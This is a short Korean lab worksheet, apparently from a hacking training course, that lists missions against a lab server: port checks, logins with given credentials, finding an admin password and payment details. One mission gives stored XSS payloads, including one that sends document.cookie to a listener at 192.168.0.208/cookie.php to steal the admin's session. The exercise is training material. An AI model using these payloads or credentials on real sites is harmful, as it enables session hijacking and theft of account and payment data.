26일차

미션1
공격은 칼리를 이용(nat)
attack.py를 이용하여 또는 완성하여 
192.168.0.127를 공격하라

베포된 암호와 베포된 계정으로 사용자를 찾아라

열려있는 포트 확인하기 : 23, 80, 3306 

계정 로그인 암호
board / pu2puDN00

미션2
서버가 운영중인 서비스는 무엇이며 설치된 파일의 위치는 어디인가?
서비스1
서비스2

미션3
데이터 베이스에 접속하라
루트 root / fnxm로 접속 후






미션4
쇼핑몰 관리자 암호는 무엇인가?

미션5
web2.st.kr 에서도 확인 가능함
해커의 CSRF공격 XSS공격을 통해 관리자 쿠키 확인하기

먼저 사이트에 글써보기

alert("");
location.href='https://www.youtube.com';
alert(document.cookie);
location.href='192.168.0.208/cookie.php?cookie='+document.cookie';
* script 앞 뒤로 붙이고 글 쓰기

그리고 칼리에서 cookie.php 생성 후 글쓰기


데이터베이스, 파일 저장 중 하나는 무조건 저장되어야 한다.

pubilc_html > 이게 디렉토리가 보이면 홈페이지가 돌아간다는 소리

미션6
결제 설정에 은행명과 계좌번호는 알아내기

	

2025 산대특